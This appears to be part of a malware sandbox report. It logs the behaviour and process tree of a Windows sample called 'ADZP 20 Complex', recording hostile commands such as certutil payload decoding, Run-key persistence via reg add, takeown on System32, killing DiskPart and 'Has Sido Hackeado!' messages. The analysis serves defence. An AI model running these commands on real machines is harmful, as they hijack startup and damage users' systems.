| File opened for modification | C:\Windows\Debug\WIA\wiatrace.log | C:\Windows\system32\mspaint.exe | N/A |
| File opened for modification | C:\Windows\Debug\WIA\wiatrace.log | C:\Windows\system32\mspaint.exe | N/A |
Enumerates physical storage devices
Gathers network information
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\ipconfig.exe | N/A |
| N/A | N/A | C:\Windows\system32\ipconfig.exe | N/A |
| N/A | N/A | C:\Windows\system32\ipconfig.exe | N/A |
| N/A | N/A | C:\Windows\system32\ipconfig.exe | N/A |
| N/A | N/A | C:\Windows\system32\ipconfig.exe | N/A |
| N/A | N/A | C:\Windows\system32\ipconfig.exe | N/A |
| N/A | N/A | C:\Windows\system32\ipconfig.exe | N/A |
| N/A | N/A | C:\Windows\system32\ipconfig.exe | N/A |
| N/A | N/A | C:\Windows\system32\ipconfig.exe | N/A |
| N/A | N/A | C:\Windows\system32\ipconfig.exe | N/A |
| N/A | N/A | C:\Windows\system32\ipconfig.exe | N/A |
| N/A | N/A | C:\Windows\system32\ipconfig.exe | N/A |
| N/A | N/A | C:\Windows\system32\ipconfig.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.vbs"
C:\Windows\System32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\TempShingapi.sk.bat" "
C:\Windows\system32\certutil.exe
certutil -decode x.bin ADZP-20-Complex.bat
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Taskdl.bat
C:\Windows\system32\reg.exe
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
C:\Windows\system32\reg.exe
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
C:\Windows\system32\ipconfig.exe
ipconfig /release
C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\System32" /r
C:\Windows\system32\taskkill.exe
taskkill /im DiskPart /f
C:\Windows\system32\attrib.exe
attrib -r -a -s -h *.*
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\system32\msg.exe
msg * Virus Detectado
C:\Windows\system32\msg.exe
msg * Virus Detectado
C:\Windows\system32\msg.exe
msg * Has Sido Hackeado!
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\ADZP-20-Complex.bat
C:\Windows\system32\notepad.exe
notepad
C:\Windows\system32\calc.exe
calc
C:\Windows\explorer.exe
explorer.exe
C:\Windows\system32\mspaint.exe
mspaint.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\ADZP-20-Complex.bat
C:\Windows\system32\notepad.exe
notepad
C:\Windows\system32\calc.exe
calc
C:\Windows\explorer.exe
explorer.exe
C:\Windows\system32\mspaint.exe
mspaint.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\ADZP-20-Complex.bat
C:\Windows\system32\notepad.exe
notepad
C:\Windows\system32\calc.exe
calc
C:\Windows\explorer.exe
explorer.exe
C:\Windows\system32\mspaint.exe
mspaint.exe
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1255964061-544150849-16573972111863020607-1660537181-13153820881570418774660387703"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-676887625-1073134067-8410375181794150156-11418564961862864579-165912570391075188"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Taskdl.bat
C:\Windows\system32\reg.exe
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Taskdl.bat
C:\Windows\system32\reg.exe
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"
C:\Windows\system32\reg.exe
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Taskdl.bat
C:\Windows\system32\reg.exe
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
C:\Windows\system32\reg.exe
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
C:\Windows\system32\ipconfig.exe
ipconfig /release
C:\Windows\system32\reg.exe
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
C:\Windows\system32\ipconfig.exe
ipconfig /release
C:\Windows\system32\ipconfig.exe
ipconfig /release
C:\Windows\system32\taskkill.exe
taskkill /im DiskPart /f
C:\Windows\system32\taskkill.exe
taskkill /im DiskPart /f
C:\Windows\system32\taskkill.exe
taskkill /im DiskPart /f
C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\System32" /r
C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\System32" /r
C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\System32" /r
C:\Windows\system32\attrib.exe
attrib -r -a -s -h *.*
C:\Windows\system32\attrib.exe
attrib -r -a -s -h *.*
C:\Windows\system32\attrib.exe
attrib -r -a -s -h *.*
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\system32\msg.exe
msg * Virus Detectado
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\system32\msg.exe
msg * Virus Detectado
C:\Windows\system32\msg.exe
msg * Virus Detectado
C:\Windows\system32\msg.exe
msg * Virus Detectado
C:\Windows\system32\msg.exe
msg * Has Sido Hackeado!
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\system32\msg.exe
msg * Has Sido Hackeado!
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\ADZP-20-Complex.bat
C:\Windows\system32\notepad.exe
notepad
C:\Windows\system32\calc.exe
calc
C:\Windows\explorer.exe
explorer.exe
C:\Windows\system32\mspaint.exe
mspaint.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\ADZP-20-Complex.bat
C:\Windows\system32\notepad.exe
notepad
C:\Windows\system32\calc.exe
calc
C:\Windows\explorer.exe
explorer.exe
C:\Windows\system32\mspaint.exe
mspaint.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\ADZP-20-Complex.bat
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\ADZP-20-Complex.bat
C:\Windows\system32\notepad.exe
notepad
C:\Windows\system32\notepad.exe
notepad
C:\Windows\system32\calc.exe
calc
C:\Windows\system32\calc.exe
calc
C:\Windows\explorer.exe
explorer.exe
C:\Windows\explorer.exe
explorer.exe
C:\Windows\system32\mspaint.exe
mspaint.exe
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\system32\mspaint.exe
mspaint.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\ADZP-20-Complex.bat
C:\Windows\system32\msg.exe
msg * Virus Detectado
C:\Windows\system32\notepad.exe
notepad
C:\Windows\system32\calc.exe
calc
C:\Windows\explorer.exe
explorer.exe
C:\Windows\system32\mspaint.exe
mspaint.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\ADZP-20-Complex.bat
C:\Windows\system32\notepad.exe
notepad
C:\Windows\system32\calc.exe
calc
C:\Windows\explorer.exe
explorer.exe
C:\Windows\system32\mspaint.exe
mspaint.exe
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\system32\msg.exe
msg * Virus Detectado
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\system32\msg.exe
msg * Has Sido Hackeado!
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\ADZP-20-Complex.bat
C:\Windows\system32\notepad.exe
notepad
C:\Windows\system32\calc.exe
calc
C:\Windows\explorer.exe
explorer.exe
C:\Windows\system32\mspaint.exe
mspaint.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\ADZP-20-Complex.bat
C:\Windows\system32\notepad.exe
notepad
C:\Windows\system32\calc.exe
calc
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\explorer.exe
explorer.exe
C:\Windows\system32\mspaint.exe
mspaint.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\ADZP-20-Complex.bat
C:\Windows\system32\notepad.exe
notepad
C:\Windows\system32\calc.exe
calc
C:\Windows\explorer.exe
explorer.exe
C:\Windows\system32\mspaint.exe
mspaint.exe
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "437577013392280940-10738306884194125961338202433694962308-12139074161007318137"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Taskdl.bat
C:\Windows\system32\reg.exe
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Taskdl.bat
C:\Windows\system32\reg.exe
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Taskdl.bat
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Taskdl.bat
C:\Windows\system32\reg.exe
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
C:\Windows\system32\reg.exe
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Taskdl.bat
C:\Windows\system32\reg.exe
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
C:\Windows\system32\reg.exe
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
C:\Windows\system32\reg.exe
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Taskdl.bat
C:\Windows\system32\reg.exe
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
C:\Windows\system32\reg.exe
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
C:\Windows\system32\reg.exe
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
C:\Windows\system32\reg.exe
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
C:\Windows\system32\ipconfig.exe
ipconfig /release
C:\Windows\system32\ipconfig.exe
ipconfig /release
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
C:\Windows\system32\ipconfig.exe
ipconfig /release
C:\Windows\system32\ipconfig.exe
ipconfig /release
C:\Windows\system32\reg.exe
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
C:\Windows\system32\ipconfig.exe
ipconfig /release
C:\Windows\system32\ipconfig.exe
ipconfig /release
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"
C:\Windows\system32\taskkill.exe
taskkill /im DiskPart /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Taskdl.bat
C:\Windows\system32\taskkill.exe
taskkill /im DiskPart /f
C:\Windows\system32\reg.exe
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Taskdl.bat
C:\Windows\system32\reg.exe
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Taskdl.bat
C:\Windows\system32\reg.exe
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
C:\Windows\system32\taskkill.exe
taskkill /im DiskPart /f
C:\Windows\system32\taskkill.exe
taskkill /im DiskPart /f
C:\Windows\system32\taskkill.exe
taskkill /im DiskPart /f
C:\Windows\system32\reg.exe
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
C:\Windows\system32\reg.exe
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
C:\Windows\system32\reg.exe
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
C:\Windows\system32\taskkill.exe
taskkill /im DiskPart /f
C:\Windows\system32\ipconfig.exe
ipconfig /release
C:\Windows\system32\ipconfig.exe
ipconfig /release
C:\Windows\system32\ipconfig.exe
ipconfig /release
C:\Windows\system32\taskkill.exe
taskkill /im DiskPart /f
C:\Windows\system32\taskkill.exe
taskkill /im DiskPart /f
C:\Windows\system32\taskkill.exe
taskkill /im DiskPart /f
C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\System32" /r
C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\System32" /r
C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\System32" /r
C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\System32" /r
C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\System32" /r
C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\System32" /r
C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\System32" /r
C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\System32" /r
C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\System32" /r
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\ADZP-20-Complex.bat
C:\Windows\system32\notepad.exe
notepad
C:\Windows\system32\cmd.exe
